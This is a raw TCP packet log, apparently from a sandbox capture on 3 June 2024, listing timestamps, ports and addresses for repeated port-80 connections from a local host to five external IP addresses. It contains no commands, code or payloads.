Jun 3, 2024 08:53:17.470704079 CEST	49175	80	192.168.2.22	91.195.240.19
Jun 3, 2024 08:53:17.475883007 CEST	80	49175	91.195.240.19	192.168.2.22
Jun 3, 2024 08:53:17.476157904 CEST	49175	80	192.168.2.22	91.195.240.19
Jun 3, 2024 08:53:17.476157904 CEST	49175	80	192.168.2.22	91.195.240.19
Jun 3, 2024 08:53:17.481199026 CEST	80	49175	91.195.240.19	192.168.2.22
Jun 3, 2024 08:53:18.323774099 CEST	80	49175	91.195.240.19	192.168.2.22
Jun 3, 2024 08:53:18.453324080 CEST	80	49175	91.195.240.19	192.168.2.22
Jun 3, 2024 08:53:18.453453064 CEST	49175	80	192.168.2.22	91.195.240.19
Jun 3, 2024 08:53:18.453538895 CEST	49175	80	192.168.2.22	91.195.240.19
Jun 3, 2024 08:53:18.458501101 CEST	80	49175	91.195.240.19	192.168.2.22
Jun 3, 2024 08:53:23.501051903 CEST	49176	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:23.506108046 CEST	80	49176	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:23.506246090 CEST	49176	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:23.506927013 CEST	49176	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:23.511842012 CEST	80	49176	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:23.512037039 CEST	80	49176	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:23.512070894 CEST	49176	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:23.516958952 CEST	80	49176	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:24.245861053 CEST	80	49176	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:24.245893002 CEST	80	49176	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:24.245913029 CEST	80	49176	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:24.245930910 CEST	80	49176	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:24.245944023 CEST	49176	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:24.245949030 CEST	80	49176	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:24.245966911 CEST	80	49176	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:24.245976925 CEST	49176	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:24.246007919 CEST	49176	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:24.246081114 CEST	80	49176	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:24.246097088 CEST	80	49176	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:24.246134043 CEST	49176	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:24.246176004 CEST	80	49176	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:24.246189117 CEST	80	49176	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:24.246299982 CEST	49176	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:24.279069901 CEST	80	49176	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:24.279139996 CEST	49176	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:25.005280018 CEST	49176	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:26.022420883 CEST	49177	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:26.027576923 CEST	80	49177	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:26.031152964 CEST	49177	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:26.031152964 CEST	49177	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:26.036184072 CEST	80	49177	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:26.777951956 CEST	80	49177	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:26.778011084 CEST	80	49177	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:26.778059959 CEST	80	49177	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:26.778073072 CEST	49177	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:26.778098106 CEST	80	49177	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:26.778134108 CEST	80	49177	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:26.778141975 CEST	49177	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:26.778171062 CEST	80	49177	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:26.778206110 CEST	80	49177	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:26.778214931 CEST	49177	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:26.778245926 CEST	80	49177	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:26.778280020 CEST	80	49177	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:26.778284073 CEST	49177	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:26.778320074 CEST	80	49177	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:26.778356075 CEST	49177	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:26.783366919 CEST	80	49177	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:26.809340000 CEST	80	49177	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:26.809420109 CEST	49177	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:27.534519911 CEST	49177	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:28.546601057 CEST	49178	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:28.551609039 CEST	80	49178	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:28.551665068 CEST	49178	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:28.551907063 CEST	49178	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:28.556826115 CEST	80	49178	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:28.556874990 CEST	49178	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:28.557148933 CEST	80	49178	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:28.561793089 CEST	80	49178	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:28.561896086 CEST	80	49178	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:29.289251089 CEST	80	49178	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:29.289299011 CEST	80	49178	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:29.289359093 CEST	80	49178	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:29.289359093 CEST	49178	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:29.289397001 CEST	80	49178	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:29.289453983 CEST	80	49178	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:29.289485931 CEST	49178	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:29.289486885 CEST	80	49178	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:29.289525032 CEST	80	49178	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:29.289556026 CEST	80	49178	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:29.289587021 CEST	49178	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:29.289591074 CEST	80	49178	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:29.289634943 CEST	80	49178	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:29.289725065 CEST	49178	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:29.294609070 CEST	80	49178	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:29.298525095 CEST	49178	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:29.322642088 CEST	80	49178	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:29.326570988 CEST	49178	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:30.059923887 CEST	49178	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:31.073759079 CEST	49179	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:31.078721046 CEST	80	49179	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:31.078783035 CEST	49179	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:31.078911066 CEST	49179	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:31.083722115 CEST	80	49179	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:31.778630972 CEST	80	49179	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:31.809875965 CEST	80	49179	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:31.810050964 CEST	49179	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:31.810050964 CEST	49179	80	192.168.2.22	198.12.241.35
Jun 3, 2024 08:53:31.814969063 CEST	80	49179	198.12.241.35	192.168.2.22
Jun 3, 2024 08:53:37.380507946 CEST	49180	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:37.385582924 CEST	80	49180	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:37.388056993 CEST	49180	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:37.391940117 CEST	49180	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:37.396958113 CEST	80	49180	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:37.397133112 CEST	80	49180	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:37.397229910 CEST	49180	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:37.402075052 CEST	80	49180	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:38.587833881 CEST	80	49180	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:38.587861061 CEST	80	49180	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:38.587878942 CEST	80	49180	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:38.587896109 CEST	80	49180	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:38.587903023 CEST	49180	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:38.587913990 CEST	80	49180	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:38.587940931 CEST	49180	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:38.588037014 CEST	80	49180	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:38.588053942 CEST	80	49180	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:38.588080883 CEST	49180	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:38.588735104 CEST	80	49180	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:38.588773966 CEST	49180	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:38.757086039 CEST	80	49180	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:38.757153988 CEST	49180	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:38.889236927 CEST	49180	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:39.903640985 CEST	49181	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:39.908816099 CEST	80	49181	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:39.912235022 CEST	49181	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:39.912235022 CEST	49181	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:39.917237043 CEST	80	49181	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:41.086045980 CEST	80	49181	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:41.086114883 CEST	80	49181	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:41.086153030 CEST	80	49181	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:41.086164951 CEST	49181	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:41.086188078 CEST	80	49181	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:41.086221933 CEST	80	49181	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:41.086226940 CEST	49181	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:41.086252928 CEST	80	49181	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:41.086287975 CEST	80	49181	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:41.086293936 CEST	49181	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:41.086324930 CEST	80	49181	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:41.086364031 CEST	49181	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:41.086894035 CEST	80	49181	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:41.250672102 CEST	80	49181	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:41.250960112 CEST	49181	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:41.416455030 CEST	49181	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:42.430655956 CEST	49182	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:42.436517000 CEST	80	49182	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:42.436707973 CEST	49182	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:42.436942101 CEST	49182	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:42.441960096 CEST	80	49182	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:42.442013979 CEST	49182	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:42.442107916 CEST	80	49182	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:42.447016954 CEST	80	49182	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:42.447132111 CEST	80	49182	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:43.639250040 CEST	80	49182	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:43.639273882 CEST	80	49182	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:43.639288902 CEST	80	49182	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:43.639303923 CEST	80	49182	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:43.639321089 CEST	80	49182	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:43.639336109 CEST	80	49182	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:43.639350891 CEST	80	49182	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:43.639364958 CEST	49182	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:43.639367104 CEST	80	49182	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:43.639364958 CEST	49182	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:43.639383078 CEST	80	49182	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:43.639403105 CEST	49182	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:43.640507936 CEST	49182	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:43.810473919 CEST	80	49182	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:43.811352968 CEST	49182	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:43.947196960 CEST	49182	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:44.958098888 CEST	49183	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:44.963083029 CEST	80	49183	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:44.963175058 CEST	49183	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:44.963506937 CEST	49183	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:44.968432903 CEST	80	49183	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:46.170798063 CEST	80	49183	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:46.340702057 CEST	80	49183	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:46.340826988 CEST	49183	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:46.340907097 CEST	49183	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:53:46.345828056 CEST	80	49183	183.111.183.31	192.168.2.22
Jun 3, 2024 08:53:51.538608074 CEST	49184	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:51.543610096 CEST	80	49184	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:51.543943882 CEST	49184	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:51.544153929 CEST	49184	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:51.549048901 CEST	80	49184	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:51.549230099 CEST	49184	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:51.549236059 CEST	80	49184	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:51.554095030 CEST	80	49184	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:52.317584038 CEST	80	49184	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:52.350914955 CEST	80	49184	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:52.351000071 CEST	49184	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:53.054011106 CEST	49184	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:54.068380117 CEST	49185	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:54.073470116 CEST	80	49185	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:54.075119019 CEST	49185	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:54.076066017 CEST	49185	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:54.081074953 CEST	80	49185	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:54.852638006 CEST	80	49185	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:54.885566950 CEST	80	49185	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:54.885627985 CEST	49185	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:55.581651926 CEST	49185	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:56.595580101 CEST	49186	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:56.600733042 CEST	80	49186	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:56.600806952 CEST	49186	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:56.601099014 CEST	49186	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:56.605998993 CEST	80	49186	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:56.606054068 CEST	49186	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:56.606137991 CEST	80	49186	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:56.611031055 CEST	80	49186	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:56.611114979 CEST	80	49186	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:57.380822897 CEST	80	49186	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:57.414103985 CEST	80	49186	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:57.415107012 CEST	49186	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:58.108814955 CEST	49186	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:59.122616053 CEST	49187	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:59.127665997 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:59.127733946 CEST	49187	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:59.127893925 CEST	49187	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:59.132707119 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:59.910418034 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:59.910448074 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:59.910487890 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:59.910563946 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:59.910569906 CEST	49187	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:59.910581112 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:59.910604954 CEST	49187	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:59.910670996 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:59.910732985 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:59.910784960 CEST	49187	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:59.910800934 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:59.910816908 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:59.910837889 CEST	49187	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:59.910875082 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:59.910918951 CEST	49187	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:59.915451050 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:59.915494919 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:59.915510893 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:53:59.915540934 CEST	49187	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:53:59.915606022 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:54:00.026977062 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:54:00.027002096 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:54:00.027030945 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:54:00.027051926 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:54:00.027055979 CEST	49187	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:54:00.027074099 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:54:00.027120113 CEST	49187	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:54:00.027133942 CEST	49187	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:54:00.027164936 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:54:00.027206898 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:54:00.027224064 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:54:00.027256966 CEST	49187	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:54:00.027894020 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:54:00.027946949 CEST	49187	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:54:00.027970076 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:54:00.027987003 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:54:00.028068066 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:54:00.028130054 CEST	49187	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:54:00.028505087 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:54:00.028557062 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:54:00.028573036 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:54:00.028594017 CEST	49187	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:54:00.028660059 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:54:00.028737068 CEST	49187	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:54:00.029061079 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:54:00.031461954 CEST	49187	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:54:00.031488895 CEST	49187	80	192.168.2.22	67.223.117.189
Jun 3, 2024 08:54:00.036339998 CEST	80	49187	67.223.117.189	192.168.2.22
Jun 3, 2024 08:54:05.084462881 CEST	49188	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:05.089528084 CEST	80	49188	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:05.092258930 CEST	49188	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:05.092258930 CEST	49188	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:05.097198963 CEST	80	49188	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:05.097297907 CEST	80	49188	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:05.100023031 CEST	49188	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:05.104876995 CEST	80	49188	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:06.173213005 CEST	80	49188	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:06.284647942 CEST	80	49188	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:06.291709900 CEST	49188	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:06.595957041 CEST	49188	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:07.609107971 CEST	49189	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:07.614146948 CEST	80	49189	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:07.614206076 CEST	49189	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:07.614444017 CEST	49189	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:07.619292021 CEST	80	49189	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:08.706489086 CEST	80	49189	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:08.820561886 CEST	80	49189	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:08.824026108 CEST	49189	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:09.123972893 CEST	49189	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:10.136328936 CEST	49190	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:10.141577959 CEST	80	49190	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:10.141666889 CEST	49190	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:10.142946005 CEST	49190	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:10.147893906 CEST	80	49190	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:10.147959948 CEST	49190	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:10.148089886 CEST	80	49190	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:10.152894974 CEST	80	49190	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:10.153043985 CEST	80	49190	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:11.229222059 CEST	80	49190	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:11.342964888 CEST	80	49190	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:11.343080997 CEST	49190	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:11.649285078 CEST	49190	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:12.663971901 CEST	49191	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:12.669364929 CEST	80	49191	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:12.669838905 CEST	49191	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:12.669840097 CEST	49191	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:12.674818993 CEST	80	49191	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:13.779272079 CEST	80	49191	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:13.779290915 CEST	80	49191	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:13.779437065 CEST	49191	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:13.892757893 CEST	80	49191	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:13.892854929 CEST	49191	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:13.892904043 CEST	49191	80	192.168.2.22	89.116.109.159
Jun 3, 2024 08:54:13.897907019 CEST	80	49191	89.116.109.159	192.168.2.22
Jun 3, 2024 08:54:19.343857050 CEST	49192	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:19.348927021 CEST	80	49192	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:19.348994017 CEST	49192	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:19.349253893 CEST	49192	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:19.354149103 CEST	80	49192	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:19.354192972 CEST	49192	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:19.354285002 CEST	80	49192	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:19.359055996 CEST	80	49192	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:20.729526997 CEST	80	49192	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:20.729557991 CEST	80	49192	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:20.729568958 CEST	80	49192	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:20.729640961 CEST	80	49192	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:20.729650974 CEST	80	49192	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:20.729720116 CEST	80	49192	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:20.729732037 CEST	80	49192	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:20.729741096 CEST	80	49192	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:20.729773998 CEST	49192	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:20.731306076 CEST	80	49192	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:20.731332064 CEST	80	49192	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:20.731344938 CEST	49192	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:20.731950998 CEST	49192	80	192.168.2.22	183.111.183.31
Jun 3, 2024 08:54:20.734678984 CEST	80	49192	183.111.183.31	192.168.2.22
Jun 3, 2024 08:54:20.736460924 CEST	80	49192	183.111.183.31	192.168.2.22
